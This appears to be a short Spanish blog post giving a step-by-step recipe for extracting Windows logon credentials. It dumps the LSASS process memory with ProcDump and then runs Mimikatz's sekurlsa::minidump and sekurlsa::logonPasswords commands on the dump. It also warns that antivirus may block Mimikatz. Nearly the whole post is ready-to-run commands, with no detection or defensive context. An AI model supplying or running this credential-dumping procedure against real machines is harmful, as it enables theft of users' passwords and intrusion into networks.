ProcDump + Mimikatz Descubriendo contraseñas.

Alto! para hacer esto tienes que partir de tener ya permisos de administrador (OOOOOOOooooocchhh!).

Herramientas:

ProcDump v9.0
https://docs.microsoft.com/es-es/sysinternals/downloads/procdump
Mimikatz
http://blog.gentilkiwi.com/securite/mimikatz/minidump

Empezamos con procdump

Según Microsoft es una herramineta para el volcado de memoria y monitorizacón de aplicaciones

(ejecuta el CMD con derechos de administrador)

procdump.exe -accepteula -ma lsass.exe (Nombre fichero).dmp (32 bits)
procdump.exe -accepteula -64 -ma lsass.exe (Nombre fichero).dmp (64 bits)

El fichero lo utilizaremos con mimikatz

Mimikatz

Aviso! Mimikatz no le gusta nada al Antivirus, puede que tengas problemas con el.

mimikatz # sekurlsa::minidump (nombre fichero).dmp
Switch to MINIDUMP

mimikatz # sekurlsa::logonPasswords full

¿ahora recuerdas el password?

saludos monsters!

Add Comment

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.